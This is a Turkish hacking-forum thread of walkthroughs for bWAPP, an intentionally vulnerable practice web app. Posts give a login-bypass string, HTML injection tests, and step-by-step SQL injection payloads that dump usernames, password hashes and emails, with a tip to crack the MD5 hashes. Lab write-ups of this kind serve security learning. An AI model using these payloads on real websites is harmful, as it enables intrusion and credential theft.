THT DUYURU

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag (CTF) Writeup Yazabileceğiniz Bölüm

takipci
chat
Seçenekler

bWAPP Çözümleri ~ Anka Tim

ᴄʀᴜᴇʟ - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
09/2013
Nereden:
Ahıska
Mesajlar:
4.429
Konular:
298
Teşekkür (Etti):
4185
Teşekkür (Aldı):
2607
Ticaret:
(0) %
5
3097
18-05-2019 00:49
#1
Arrow
bWAPP Çözümleri ~ Anka Tim


Bu konu altında bWAPP'in çözümleri paylaşılacaktır.


bWAPP (Buggy Web Application) Nedir?
bWAPP, web uygulama güvenliğinde kendini geliştirmek isteyenler için hazırlanmış ücretsiz ve açık kaynak bir pentest/hacking test laboratuvarıdır. OWASP tarafından belirlenen en kritik güvenlik açıklarını hem saldırı hem de savunma yönünden öğrenmenize yardımcı olur.
bWAPP'de üç zorluk seviyesi bulunuyor. Bunlar; low, medium ve high.

DVWA'den daha kapsamlıdır ve çok daha fazla zaafiyeti barındırır. Daha önce açtığımız DVWA Çözümleri konusana göz atabilirsiniz.

DVWA Çözümleri ~ Anka Tim


bWAPP Hangi Zaafiyetleri Barındırıyor?
Kod:
A1 -  Injection

HTML Injection - Reflected (GET)
HTML Injection - Reflected (POST)
HTML Injection - Reflected (Current URL)
HTML Injection - Stored (Blog)
iFrame Injection
LDAP Injection (Search)
Mail Header Injection (SMTP)
OS Command Injection
OS Command Injection - Blind
PHP Code Injection
Server-Side Includes (SSI) Injection
SQL Injection (GET/Search)
SQL Injection (GET/Select)
SQL Injection (POST/Search)
SQL Injection (POST/Select)
SQL Injection (AJAX/JSON/jQuery)
SQL Injection (CAPTCHA)
SQL Injection (Login Form/Hero)
SQL Injection (Login Form/User)
SQL Injection (SQLite)
SQL Injection (Drupal)
SQL Injection - Stored (Blog)
SQL Injection - Stored (SQLite)
SQL Injection - Stored (User-Agent)
SQL Injection - Stored (XML)
SQL Injection - Blind - Boolean-Based
SQL Injection - Blind - Time-Based
SQL Injection - Blind (SQLite)
SQL Injection - Blind (Web Services/SOAP)
XML/XPath Injection (Login Form)
XML/XPath Injection (Search)


A2 - Broken Auth. & Session Mgmt.

Broken Authentication - CAPTCHA Bypassing
Broken Authentication - Forgotten Function
Broken Authentication - Insecure Login Forms
Broken Authentication - Logout Management
Broken Authentication - Password Attacks
Broken Authentication - Weak Passwords
Session Management - Administrative Portals
Session Management - Cookies (HTTPOnly)
Session Management - Cookies (Secure)
Session Management - Session ID in URL
Session Management - Strong Sessions


A3 - Cross-Site Scripting (XSS)

Cross-Site Scripting - Reflected (GET)
Cross-Site Scripting - Reflected (POST)
Cross-Site Scripting - Reflected (JSON)
Cross-Site Scripting - Reflected (AJAX/JSON)
Cross-Site Scripting - Reflected (AJAX/XML)
Cross-Site Scripting - Reflected (Back Button)
Cross-Site Scripting - Reflected (Custom Header)
Cross-Site Scripting - Reflected (Eval)</option>
Cross-Site Scripting - Reflected (HREF)</option>
Cross-Site Scripting - Reflected (Login Form)
Cross-Site Scripting - Reflected (phpMyAdmin)
Cross-Site Scripting - Reflected (PHP_SELF)
Cross-Site Scripting - Reflected (Referer)
Cross-Site Scripting - Reflected (User-Agent)
Cross-Site Scripting - Stored (Blog)
Cross-Site Scripting - Stored (Change Secret)
Cross-Site Scripting - Stored (Cookies)
Cross-Site Scripting - Stored (SQLiteManager)
Cross-Site Scripting - Stored (User-Agent)


A4 - Insecure Direct Object References 

Insecure DOR (Change Secret)
Insecure DOR (Reset Secret)
Insecure DOR (Order Tickets)
A5 - Security Misconfiguration
Arbitrary File Access (Samba)
Cross-Domain Policy File (Flash)
Cross-Origin Resource Sharing (AJAX)
Cross-Site Tracing (XST)
Denial-of-Service (Large Chunk Size)
Denial-of-Service (Slow HTTP DoS)
Denial-of-Service (SSL-Exhaustion)
Denial-of-Service (XML Bomb)
Insecure FTP Configuration
Insecure SNMP Configuration
Insecure WebDAV Configuration
Local Privilege Escalation (sendpage)
Local Privilege Escalation (udev)
Man-in-the-Middle Attack (HTTP)
Man-in-the-Middle Attack (SMTP)
Old/Backup & Unreferenced Files
Robots File


A6 - Sensitive Data Exposure 

Base64 Encoding (Secret)
BEAST/CRIME/BREACH Attacks
Clear Text HTTP (Credentials)
Heartbleed Vulnerability
Host Header Attack (Reset Poisoning)
HTML5 Web Storage (Secret)
POODLE Vulnerability
SSL 2.0 Deprecated Protocol
Text Files (Accounts)


A7 - Missing Functional Level Access Control 

Directory Traversal - Directories
Directory Traversal - Files
Host Header Attack (Cache Poisoning)
Host Header Attack (Reset Poisoning)
Local File Inclusion (SQLiteManager)
Remote & Local File Inclusion (RFI/LFI)
Restrict Device Access
Restrict Folder Access
Server Side Request Forgery (SSRF)
XML External Entity Attacks (XXE)


A8 - Cross-Site Request Forgery (CSRF)

Cross-Site Request Forgery (Change Password)
Cross-Site Request Forgery (Change Secret)
Cross-Site Request Forgery (Transfer Amount)


A9 - Using Known Vulnerable Components

Buffer Overflow (Local)
Buffer Overflow (Remote)
Drupal SQL Injection (Drupageddon)
Heartbleed Vulnerability
PHP CGI Remote Code Execution
PHP Eval Function
phpMyAdmin BBCode Tag XSS
Shellshock Vulnerability (CGI)
SQLiteManager Local File Inclusion
SQLiteManager PHP Code Injection
SQLiteManager XSS


A10 - Unvalidated Redirects & Forwards 

Unvalidated Redirects & Forwards (1)
Unvalidated Redirects & Forwards (2)
Other bugs... 
ClickJacking (Movie Tickets)
Client-Side Validation (Password)
HTTP Parameter Pollution
HTTP Response Splitting
HTTP Verb Tampering
Information Disclosure - Favicon
Information Disclosure - Headers
Information Disclosure - PHP version
Information Disclosure - Robots File
Insecure iFrame (Login Form)
Unrestricted File Upload


---------------  Extras  ----------------

 A.I.M. - No-authentication Mode
Client Access Policy File
Cross-Domain Policy File
Evil 666 Fuzzing Page
Manual Intervention Required!
Unprotected Admin Portal
We Steal Secrets... (html)
We Steal Secrets... (plain)
WSDL File (Web Services/SOAP)


ANKA TİM
---------------------
Bir kemiğin ardında saatlerce yol giden
itler bile gülecek kimsesizliğimize


Konu The CrueL tarafından (18-05-2019 01:02 Saat 01:02 ) değiştirilmiştir.
boole, zancrow, "Tranquila, goodshepherd Teşekkür etti.
нydrαтнαlleѕ - ait Kullanıcı Resmi (Avatar)
İstihbarat Tim (Kıdemli)
Üyelik tarihi:
01/2017
Mesajlar:
2.525
Konular:
153
Teşekkür (Etti):
573
Teşekkür (Aldı):
751
Ticaret:
(0) %
18-05-2019 01:39
#2
bWAPP Low Level - XML/XPath Injection (Login Form)
bWAPP Low Level - XML/XPath Injection (Login Form)


İlk önce XML/XPath Injection (Login Form) u seçiyoruz



seçip girdikten sonra bize ıd ve password girili bir alan geliyor. Id : Bee password : Bug






Yukarıdaki resimde giriş denemesi yapılınca error veriyor sıra bypass kodumuzu deniyoruz


bypass kodumuz : 1'or'1'='1

Giriş yapiyoruz ve resim deki gibi başarılı sonuç aliyoruz.






Videolu anlatım

--------------------- Başkasının yolunda doğru gideceğime, kendi yolumda yanlış giderim.
Konu The CrueL tarafından (18-05-2019 01:44 Saat 01:44 ) değiştirilmiştir.
BAGAY, boole, RTFM, goodshepherd, "Tranquila Teşekkür etti.
нydrαтнαlleѕ - ait Kullanıcı Resmi (Avatar)
İstihbarat Tim (Kıdemli)
Üyelik tarihi:
01/2017
Mesajlar:
2.525
Konular:
153
Teşekkür (Etti):
573
Teşekkür (Aldı):
751
Ticaret:
(0) %
21-05-2019 22:25
#3
bWAPP Low Level - HTML Injection - Reflected (GET)

Öncelikle bWAPP HTML Injection - Reflected (GET)'i seçiyoruz



Ardından deneme olarak normal bir şekilde K.adına Hydra Şifre ye ise Thalles yazıyoruz




Go dedikten sonra bize resimde ki gibi bir dönüt veriyor.




Şimdi ise html header etiketi ile deneme yapiyorum.




Evet şifre yerine <h1> etiketini kullanarak Turkhackteam.org yaziyorum ve burada aldığım dönüt ise resimde ki gibidir, buradan html reflected açığı olduğunu anliyoruz.



Videolu anlatımı


--------------------- Başkasının yolunda doğru gideceğime, kendi yolumda yanlış giderim.
BAGAY - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2014
Nereden:
127.0.0.1
Yaş:
21
Mesajlar:
652
Konular:
45
Teşekkür (Etti):
56
Teşekkür (Aldı):
120
Ticaret:
(0) %
22-05-2019 00:49
#4

SQL INJECTION (SQLITE)


bWAPP Bugs bölümünden SQL Injection (Sqlite) ‘ı seçiyoruz ve Hack diyoruz


Sistemde sql açığı olduğunu bildiğimiz için hata var mı diye bakmayacağım. Direkt tabloları bulmaya başlayalım.Normalde sitelerde php?id=2 gibi sonunda bi sayı oluyor o sayıyı 0 varmış gibi varsayarak tabloları şöyle arayacağız.1,2,3,4 diye tek tek arayacağız hangisinde site hata vermezse tablo sayımızı bulduk demektir


Evet bulduk 6 tablomuz varmış
0’ union select all 1,2,3,4,5,6 —

Daha sonra
Sistem sqlite olduğu için veritabanı adı sqlite_master dır.




0’ union select all 1,tbl_name,3,4,5,6 from sqlite_master —
Sorgusunu yaptık ve tablo isimlerini öğrendik.Bize lazım olan tablo adı users.




Daha sonra bu sorgumuzu yapıyoruz.
0’ union select all 1,sql,3,4,5,6 from sqlite_master where tbl_name=‘users’ —
Burada users tablomuzun içindeki değişkenlerin ismini öğreniyoruz ve buna göre bilgilerini çekeceğiz.



Geldik verileri çekmeye.Veri çekmek içinde şu sorgumuzu kullanıyoruz;
0’ union select all 1,id,login,password,email,6 from users —


Evet kullanıcı adı mail şifre hepsi geldi.Şifre md5 olarak geliyor.Onu çözmek içinde md5 crasher kullanabilirsiniz.
---------------------
NE MUTLU TÜRK'ÜM DİYENE

Konu BAGAY tarafından (22-05-2019 00:53 Saat 00:53 ) değiştirilmiştir.
RTFM, goodshepherd, "Tranquila Teşekkür etti.
BAGAY - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2014
Nereden:
127.0.0.1
Yaş:
21
Mesajlar:
652
Konular:
45
Teşekkür (Etti):
56
Teşekkür (Aldı):
120
Ticaret:
(0) %
22-05-2019 21:21
#5
bWAPP SQL Injection - Stored(Blog)

bWAPP Bugs bölümünden SQL Injection - Stored(Blog) u seçiyoruz ve sonra Hack diyoruz.


Blog ekleme yerine ‘ yazıyoruz ve bu hatayı alıyoruz sql açık mevcut demektir.




Veritabanı adını öğrenmek için şu sorguyu yapıyoruz;
bbb’ ,(select database()))— -

Veritabanı adımızı öğrendik aşağıdaki resimdeki gibiymiş.




Veritabanı adı “bWAPP” ve buradan direkt tabloların isimleri çekelim.
bbb’ ,(select group_concat(table_name) FROM information_Schema.tables where table_schema = “bWAPP”)) —



Daha sonra users isimli tablomuzun kolonlarını çekiyoruz şu sorgu ile ;
bbb’ ,(select group_concat(column_name) FROM information_Schema.columns where table_name = “users”)) —




En son olarak da bilgileri çekiyoruz şöyle ;
bbb’ ,(select group_concat(id, login, password, email) FROM users)) —


---------------------
NE MUTLU TÜRK'ÜM DİYENE

RTFM, "Tranquila, goodshepherd Teşekkür etti.
нydrαтнαlleѕ - ait Kullanıcı Resmi (Avatar)
İstihbarat Tim (Kıdemli)
Üyelik tarihi:
01/2017
Mesajlar:
2.525
Konular:
153
Teşekkür (Etti):
573
Teşekkür (Aldı):
751
Ticaret:
(0) %
22-05-2019 22:37
#6
bWAPP Low Level - HTML Injection - Reflected (Post)

Öncelikle bWAPP HTML Injection - Reflected (Post)'i seçiyoruz




Ardından deneme olarak normal bir şekilde K.adına Hydra Şifre ye ise Thalles yazıyoruz




Go dedikten sonra bize resimde ki gibi bir dönüt veriyor.




Şimdi ise html header etiketi ile deneme yapiyorum.




Evet şifre yerine <h1> etiketini kullanarak Turkhackteam.org yaziyorum ve burada aldığım dönüt ise resimde ki gibidir, buradan html reflected açığı olduğunu anliyoruz.




Videosu




Get ile Post arasında ki fark ;

Get url üzerinden yönetilebilir , Post ise veri girebildiğimiz bir yerden
--------------------- Başkasının yolunda doğru gideceğime, kendi yolumda yanlış giderim.
RTFM, goodshepherd Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler





1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291